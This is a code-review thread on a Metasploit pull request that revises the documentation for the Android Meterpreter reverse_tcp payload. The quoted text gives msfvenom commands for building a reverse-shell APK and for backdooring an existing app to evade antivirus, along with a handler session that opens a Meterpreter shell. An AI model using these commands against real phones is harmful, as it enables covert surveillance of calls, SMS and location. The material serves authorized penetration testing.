Update documentation/modules/payload/android/meterpreter/reverse_tcp.md to add in BlueStack reference and fix msftidy errors (#16342)
rapid7/metasploit-framework: documentation/modules/payload/android/meterpreter/reverse_tcp.md

> The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.

Reviewer: Might be good to update this section with a new section like `## Overview` or similar if we are going to be adding more sections below this.

> ### To create the APK with msfvenom:

Reviewer: ```suggestion
## To create the APK with msfvenom:
```

This isn't really a subsection and so it should follow the same level 2 heading format as the rest of this document.

```

> ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk

Reviewer: ```suggestion
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT TO CONNECT BACK ON] -f raw -o /tmp/android.apk
```

Don't want to limit this to just one port or give the impression that it has to be set to a specific value.

```

> ### To inject meterpreter into an existing APK with msfvenom:

Reviewer: ```suggestion
## To inject meterpreter into an existing APK with msfvenom:
```

This isn't really a subsection and so it should follow the same level 2 heading format as the rest of this document.

You can also add Android meterpreter to any existing APK. This will make it harder for
Anti-virus software to detect the payload, and allow you read internal files and take
screenshots of the Android app that you are backdooring:

```

> ./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk

Reviewer: I'd also recommend updating this to make it more clear that the `-x` parameter is a local file and not some string. Something like this might work:

```suggestion
./msfvenom -p android/meterpreter/reverse_tcp -x <PATH TO LOCAL APK FILE> LHOST=[IP] LPORT=[PORT TO CONNECT BACK ON] -f raw -o /tmp/android.apk
```

```

[Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md).

Next, start an Android device. Upload the APK, and execute it. There are different ways to do this.

> 
> 

Reviewer: ```suggestion

```

An emulator is the most convenient way to test Android Meterpreter. You can try:

* [Bluestacks](https://www.bluestacks.com/)  - Very easy to install Android Emulator on Windows.
* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal.
* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK.

> * [GenyMotion](https://www.genymotion.com/download/) - Requires an account. 

Reviewer: Should align following line with indentation of this line.

## Verification Steps

Currently, the most common way to use Android Meterpreter is to create it as an APK, and then
execute it in victim device.

> To start listner run msfconsole in terminal and then set listner settings:

Reviewer: ```suggestion
To start a listener run `msfconsole` in terminal and follow the following steps:
```

```
msf > use exploit/multi/handler
msf > set payload/android/meterpreter/reverse_tcp 
msf payload(reverse_tcp) > set LHOST 192.168.1.199
LHOST => 192.168.1.199
msf payload(reverse_tcp) > run -j
[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) > sessions    (To check which session is running type: 'sessions', in my case it is 1)
  ID  Name  Type                           Information   Connection
  __  ____  ___                            ___________   __________
  1       android/meterpreter/reverse_tcp  u0_localhost  192.168.1.199:4444=> 192.168.0.110:35713
  
  

> msf payload(reverse_tcp) > sessions -i 1   (To set the session to proceed the attack)

Reviewer: This section doesn't make sense. You should explain to the end user that you have now executed the APK on the target and thus have gotten the session. If anything there should be output showing the connection back to you within `msfconsole` but you don't show this or otherwise provide any evidence as to how the session is obtained. It just *poof* appears. 

You need to explain how you get this session. I don't care if you break this up into two code segments and remove your comments in `( )`, as that would actually make the output cleaner and would allow you to take a paragraph or so to explain what has occurred, how you get the session, and what your going to do next, and then you code can showcase the instructions to do that.

Reviewer: Resolved as updated change doesn't contain this information anymore, was decided change didn't make sense in grand scheme of this documentation.

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] Starting the payload handler...
[*] Sending stage (62432 bytes) to 192.168.1.199
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600

meterpreter > 

> ```

Reviewer: If I'm being honest I'm a little confused on this change. There doesn't seem to be much changed here other than reformatting it to your personal preference? Near as I can tell the only difference in this PR has been the addition of the BlueStacks link, the rest has just been reorganizing the wording into different areas.
